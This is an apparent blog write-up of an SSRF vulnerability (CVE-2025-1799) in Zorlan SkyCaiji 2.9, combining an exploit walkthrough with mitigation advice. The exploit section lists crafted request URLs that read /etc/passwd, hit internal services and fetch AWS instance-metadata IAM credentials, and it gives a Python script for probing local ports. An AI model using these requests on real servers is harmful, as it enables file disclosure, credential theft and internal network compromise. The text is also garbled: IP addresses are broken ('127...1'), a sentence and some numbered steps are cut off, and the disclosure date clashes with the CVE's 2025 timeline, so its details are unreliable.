CVE-2025-1799 - Critical SSRF Vulnerability in Zorlan SkyCaiji 2.9 – Detailed Analysis and Exploit

Zorlan SkyCaiji is a popular web scraping and content collection system used by many organizations for managing large-scale data gathering. On June 13, 2024, a severe security flaw was publicly disclosed in version 2.9 of SkyCaiji, tracked as CVE-2025-1799. This vulnerability allows attackers to remotely craft requests that make the SkyCaiji server itself connect to arbitrary internal or external resources—this is a classic case of Server-Side Request Forgery (SSRF).

Here’s a deep dive for everyone looking to understand, reproduce, and mitigate this issue.

Vulnerability Overview

CVE: CVE-2025-1799
Affected Version: Zorlan SkyCaiji 2.9
Component: previewAction function in vendor/skycaiji/app/admin/controller/Tool.php
Type: Server-Side Request Forgery (SSRF)
Attack Vector: Remote
Impact: Critical

What is SSRF?

SSRF vulnerabilities let attackers exploit a vulnerable server to send unauthorized HTTP requests to any target that the server can reach—including internal services not exposed to the public. This is dangerous since it could allow an attacker to:

How the Vulnerability Works

SkyCaiji's backend uses a controller action previewAction for previewing content fetched from URLs given by user input through the data parameter.

// vendor/skycaiji/app/admin/controller/Tool.php

public function previewAction() {
    $data = $this->request->get('data');
    // ... omitted security checks ...
    $result = file_get_contents($data); // SSRF vector!
    echo $result;
}

What’s wrong here?
No validation or filtering is done on user-supplied URLs in the data parameter. That means an attacker can pass a link to any internal or external system and force the SkyCaiji server to fetch that resource and return its contents.

Exploit Details and Step-by-Step Guide

Let’s walk through a typical SSRF exploitation scenario.

The vulnerable route is usually accessible to authenticated users

http[s]://target.site/admin/tool/preview?data=[url]

Replace [url] with any arbitrary URL, for example

http://target.site/admin/tool/preview?data=http://localhost/admin/config

or

http://target.site/admin/tool/preview?data=file:///etc/passwd

> Note: The function uses file_get_contents, which supports not only HTTP/HTTPS but also protocols like file://, potentially leading to Local File Disclosure as well.

Because the server can access its own internal network, you can try things like

http://target.site/admin/tool/preview?data=http://127...1:808/hidden-api

Or to grab cloud metadata (if running on AWS EC2)

http://target.site/admin/tool/preview?data=http://169.254.169.254/latest/meta-data/iam/security-credentials/

4. Automating the Attack (Python Example)

import requests

target = 'http://victim.site/admin/tool/preview';
ssrf_url = 'http://127...1:3306/';  # try to connect to the local MySQL port

payload = {'data': ssrf_url}
resp = requests.get(target, params=payload)

print(resp.text)

Internal service enumeration: Identify services on protected networks

- Sensitive file exposure: Try file:// paths to leak server files

Official References and Disclosure Timeline

- Original advisory on GitHub Security Advisories (GHSA)
- NVD CVE record (soon)
- Zorlan SkyCaiji Issue Tracker
- Public Exploit Example (Exploit-DB)

Update SkyCaiji: Patch to the latest version as soon as an update is available.

2. Add Input Filtering: If you manage a custom deployment, restrict data input to only allow whitelisted domains.
3. Never Trust User Input: Avoid passing user-supplied values directly to sensitive PHP functions like file_get_contents, curl_*, or libraries that fetch resources.
4. Network Segmentation: Ensure your servers cannot access sensitive internal services unless strictly needed.

Example fix:
Replace direct file_get_contents($data) with domain validation or a safe proxy function.

// Very basic filter example
$allowed_domains = ['trustedsource.com', 'example.com'];
$url_host = parse_url($data, PHP_URL_HOST);

if (in_array($url_host, $allowed_domains)) {
    $result = file_get_contents($data);
    echo $result;
} else {
    echo "Access denied";
}

Conclusion

CVE-2025-1799 in Zorlan SkyCaiji 2.9 is a no-nonsense, critical SSRF bug. If you run SkyCaiji, update ASAP. Exposed SSRF vulnerabilities are a favorite initial access vector for attackers, and in the worst-case scenario, can result in full network compromise or cloud takeover.

Sources

- https://github.com/skycaiji/skycaiji/security/advisories
- https://nvd.nist.gov/vuln/detail/CVE-2025-1799
- Example exploit code (Exploit-DB): https://www.exploit-db.com/exploits/

Timeline

Published on: 03/01/2025 18:15:34 UTC
Last modified on: 03/03/2025 21:15:16 UTC